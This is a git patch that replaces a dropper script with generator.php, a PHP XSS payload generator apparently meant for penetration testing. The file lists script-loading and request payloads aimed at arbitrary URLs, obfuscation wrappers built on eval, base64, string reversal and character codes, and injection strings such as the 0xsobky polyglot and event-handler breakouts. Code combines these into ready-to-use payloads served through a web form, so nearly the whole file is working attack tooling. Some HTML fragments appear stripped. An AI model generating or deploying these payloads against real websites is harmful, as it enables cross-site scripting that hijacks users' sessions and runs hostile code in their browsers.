From f8eaa244920a6c565c45cd78ac925a7c97eb9c8b Mon Sep 17 00:00:00 2001 From: strawp Date: Fri, 31 May 2019 10:48:16 +0100 Subject: [PATCH] First reasonably working version --- dropper.php | 28 ---- generator.php | 373 ++++++++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 373 insertions(+), 28 deletions(-) delete mode 100644 dropper.php create mode 100644 generator.php diff --git a/dropper.php b/dropper.php deleted file mode 100644 index 848bb70..0000000 --- a/dropper.php +++ /dev/null @@ -1,28 +0,0 @@ - diff --git a/generator.php b/generator.php new file mode 100644 index 0000000..3cd4030 --- /dev/null +++ b/generator.php @@ -0,0 +1,373 @@ + "Load script ($.getScript())", + "desc" => "Load an external script into the DOM using jQuery, if jQuery is already loaded into the DOM", + "code" => "$.getScript(\"{url}\")", + "fields" => "filepicker,url" + ], + [ + "name" => "Load script (document.createElement())", + "desc" => "Load an external script into the DOM using native document.createElement() methods", + "code" => "e=document.createElement(\"script\");e.src=\"{url}\";document.body.appendChild(e);", + "fields" => "filepicker,url" + ], + [ + "name" => "Request URL (img)", + "desc" => "Make a blind, cross-origin request to an arbitrary URL", + "code" => "new Image().src=\"{url}\"", + "fields" => "url" + ], + [ + "name" => "Request URL (XHR)", + "desc" => "Make a same-origin or CORS request to an arbitrary URL", + "code" => "x=new XMLHttpRequest();x.open(\"GET\",\"{url}\");x.send()", + "fields" => "url" + ], + [ + "name" => "JavaScript code", + "desc" => "Inject custom inline JavaScript code", + "code" => "{js}", + "fields" => "js" + ] + /* + [ + "name" => "Dropper (multiple scripts / automatic payload)", + "desc" => "Load a set of scripts using this dropper to determine the best payload", + "code" => "" + ], + */ + ]; + + /* + Obfuscation + - None + - base64 (btoa()) + - reverse + - String.fromCharCode() + - character hex code + */ + $aObfuscation = [ + [ + "name" => "None", + "desc" => "No obfuscation", + "code" => "{payload}" + ], + [ + "name" => "String eval", + "desc" => "Pass the payload as a string into eval()", + "code" => "eval('{payload}')" + ], + [ + "name" => "base64 (atob())", + "desc" => "base64 encode and execute using eval()", + "code" => "eval(atob('{payloadb64}'))" + ], + [ + "name" => "reverse", + "desc" => "Reverse payload string and execute using eval()", + "code" => "eval('{payloadrev}'.split('').reverse().join(''))" + ], + [ + "name" => "String.fromCharCode()", + "desc" => "Build payload string one char at a time using the ordinal value", + "code" => "eval({payloadchr})" + ], + [ + "name" => "Character hex codes", + "desc" => "Construct the payload using hex value of each character", + "code" => "eval({payloadhex})" + ] + ]; + + /* + Injection + - Basic polyglot / inline script + - 0xsobky - Ultimate XSS Polyglot + - String variable escape + - img element onerror + - SVG element + - Element onclick + - Element onmouseover + */ + $aInjections = [ + [ + "name" => "Basic polyglot / inline script", + "desc" => "Code execution using basic break-out technique", + "code" => "'\">" + ], + [ + "name" => "0xsobky - Ultimate XSS Polyglot", + "desc" => "Long, very flexible payload good for blind injection and fuzzing", + "code" => "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcliCk={payload} )//%0D%0A%0d%0a//\\x3csVg/\\x3e" + ], + [ + "name" => "String variable escape", + "desc" => "Break out from within a string in block of JavaScript", + "code" => "\";//';\n{payload}" + ], + [ + "name" => "img element onerror", + "desc" => "Inject an invalid element with the payload within onerror", + "code" => "" + ], + [ + "name" => "SVG element", + "desc" => "Inject an SVG element containing the payload within onload", + "code" => "" + ], + [ + "name" => "Element onclick", + "desc" => "Break out of an element attribute and add an onclick event", + "code" => "'\" onclick={payload}>" + ], + [ + "name" => "Element onmouseover", + "desc" => "Break out of an element attribute and add an onmouseover event", + "code" => "'\" onmouseover={payload}>" + ] + ]; + + + // Logic for generating a payload + function generatePayload( $form ){ + global $aPayloads, $aObfuscation, $aInjections; + $required = ['payloadid','injectionid','obfuscationid']; + foreach( $required as $item ){ + if( !in_array( $item, array_keys( $form ) ) ) return $item." not provided"; + } + + $rtn = []; + $rtn['meta'] = []; + if( !in_array( $form['payloadid'], array_keys( $aPayloads ) ) ) $form['payloadid'] = 0; + $payload = $aPayloads[$form['payloadid']]; + $rtn['meta']['payload'] = $payload; + + + // Replace values in code with form values + $fields = explode( ",", $payload["fields"] ); + $code = $payload['code']; + foreach( $fields as $f ){ + if( !in_array( $f, array_keys( $form ) ) ) continue; + $code = str_replace( '{'.$f.'}', $form[$f], $code ); + } + $rtn['payload'] = $code; + + // Prepare payloads + $prep = []; + $prep['payload'] = $code; + $prep['payloadb64'] = base64_encode( $code ); + $prep['payloadrev'] = strrev( $code ); + $chrs = []; + for( $i=0; $i $v ){ + $code = str_replace( '{'.$k.'}', $v, $code ); + } + $rtn['obfuscated'] = $code; + + // Insert into injection string + if( !in_array( $form['injectionid'], array_keys( $aInjections ) ) ) $form['injectionid'] = 0; + $injection = $aInjections[$form['injectionid']]; + $rtn['meta']['injection'] = $injection; + $code = str_replace( '{payload}', $code, $injection['code'] ); + $rtn['inject'] = $code; + return $rtn; + } + + // Generate the actual payload + if( $_GET['mode'] == 'ajax' ){ + header('Content-Type: text/json'); + $rtn = generatePayload( $_GET ); + echo json_encode( $rtn ); + exit; + } + + // Show form to generate a payload + if( empty( $_GET["mode"] ) || $_GET["mode"] == "generate"){ +?> + + +XSS Payload Generator + + + + +

XSS Payload Generator

+
+
+ + +
+
+
+ + +
+
+ + +
+
+ + +
+
+ + +
+
+
+ + +
+
+
+ + +
+
+ +